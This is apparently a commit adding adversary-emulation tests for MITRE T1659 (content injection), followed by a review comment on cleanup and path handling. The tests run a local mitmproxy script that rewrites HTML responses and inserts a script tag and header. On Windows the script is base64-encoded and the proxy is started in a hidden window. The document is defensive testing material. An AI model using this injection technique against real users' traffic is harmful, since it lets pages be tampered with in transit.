New Test T1659 (Content Injection Using MITM Proxy) (#3305)

Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>
Wai Linn Oo
2026-04-20 08:50:13 +06:30
committed by GitHub
parent 4ad4adf40a
commit 53c52a2d58
+101
@@ -0,0 +1,101 @@
attack_technique: T1659
display_name: Content Injection
atomic_tests:
- name: MITM Proxy Injection
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: |
command -v python3
get_prereq_command: |
brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
- description: curl must be installed
prereq_command: |
command -v curl
get_prereq_command: |
brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
- description: pipx must be installed
prereq_command: |
pipx --version
get_prereq_command: |
brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
- description: mitmproxy must be installed
prereq_command: |
pipx list | grep mitmproxy
get_prereq_command: |
pipx install mitmproxy || brew install mitmproxy
- description: mitmdump must be running on port 8080
prereq_command: |
lsof -i tcp:8080 | grep mitmdump
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
- name: MITM Proxy Injection (Windows)
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: |
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
winget install --id Python.Python.3 -e
- description: curl must be installed
prereq_command: |
if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
winget install --id cURL.cURL -e
- description: mitmproxy must be installed and in PATH
prereq_command: |
if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
python -m pip install mitmproxy
- description: mitmdump must be running on port 8080
prereq_command: |
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
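Review bot: The cleanup in both tests (`pkill -f mitmdump || true` on the Linux/macOS side and `Stop-Process -Name "mitmdump"` on Windows) terminates every mitmdump process on the host, not only the instance the prereq started, so running the test on a machine where an operator already has a mitmproxy session kills that session. Capturing the PID when the proxy is launched and stopping only that process keeps cleanup scoped to what the test created; a sketch for both executors follows. The Linux start line also hard-codes `$HOME/.local/bin/mitmdump`, which only holds when pipx did the install, while the dependency's fallback `brew install mitmproxy` puts the binary elsewhere and the `pipx list | grep mitmproxy` check would still report it missing — resolving the path with `command -v mitmdump` first covers both. Separately, the Windows `Start-Process` passes the same file to `-RedirectStandardOutput` and `-RedirectStandardError`; I believe Start-Process rejects identical paths for those two parameters, so this is worth checking on a Windows host (the sketch uses a separate `.err` file). The hunk header reports 101 added lines but fewer are shown here, so the tail of the file may be cut off in this view.
```yaml
# … unchanged: linux/macos dependency entries before "mitmdump must be running on port 8080" …
# (the printf that writes /tmp/atomic_t1659_inject.py is unchanged and precedes these lines)
    get_prereq_command: |
      MITMDUMP="$(command -v mitmdump || echo "$HOME/.local/bin/mitmdump")"
      ("$MITMDUMP" -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 & echo $! > /tmp/atomic_t1659.pid)
      sleep 5
      lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
# … unchanged: linux/macos executor …
    cleanup_command: |
      [ -f /tmp/atomic_t1659.pid ] && kill "$(cat /tmp/atomic_t1659.pid)" 2>/dev/null
      rm -f /tmp/atomic_t1659_inject.py /tmp/atomic_t1659.log /tmp/curl_out.txt /tmp/atomic_t1659_page.html /tmp/atomic_t1659.pid
# … unchanged: windows dependency entries before "mitmdump must be running on port 8080" …
# (the base64 decode that writes $env:TEMP\atomic_t1659_inject.py is unchanged and precedes these lines)
    get_prereq_command: |
      $p = Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.err" -WindowStyle Hidden -PassThru
      $p.Id | Out-File -FilePath "$env:TEMP\atomic_t1659.pid"
      Start-Sleep -Seconds 5
# … unchanged: port-8080 ownership check, windows executor …
    cleanup_command: |
      if (Test-Path "$env:TEMP\atomic_t1659.pid") { Stop-Process -Id (Get-Content "$env:TEMP\atomic_t1659.pid") -ErrorAction SilentlyContinue }
      Remove-Item "$env:TEMP\atomic_t1659.pid", "$env:TEMP\atomic_t1659.err" -ErrorAction SilentlyContinue
```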